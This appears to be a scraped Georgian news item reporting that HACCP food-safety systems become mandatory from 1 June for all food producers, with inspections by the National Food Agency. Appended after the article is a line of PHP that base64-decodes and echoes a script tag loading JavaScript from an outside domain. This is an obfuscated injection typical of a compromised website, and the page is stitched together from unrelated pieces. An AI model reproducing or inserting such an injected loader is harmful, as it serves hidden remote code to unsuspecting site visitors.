celsiusi
ავერსი შნაიდერი

დღეიდან, 1-ელი ივნისიდან HACCP-ის დანერგვა სურსათის მწარმოებელი ყველა ობიექტისთვის სავალდებულო ხდება.  ბიზნესი ვალდებულია წინასწარ განისაზღვროს და გაკონტროლდეს სურსათის წარმოება-რეალიზაციის პროცესში არსებული პოტენციური საფრთხეები და შესაბამისად, მომხმარებელს უვნებელი სურსათი მიაწოდოს.

რეგულაცია ვრცელდება მათ შორის პურ-ფუნთუშეულის, საკონდიტრო წარმოებებსა და წისქვილკომბინატებზე და ყველა იმ ბიზნესოპერატორს ეხება, რომელიც სურსათს აწარმოებს და ყიდის.

სურსათის ეროვნული სააგენტო ბიზნესოპერატორების შემოწმებას დღეიდან დაიწყებს. იქ, სადაც მოთხოვნილი სისტემა გონივრულ ვადებში არ იქნება დანერგილი, მაკონტროლებელი უწყება საწარმოო პროცესის გაჩერების გადაწყვეტილებას მიიღებს.

441
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");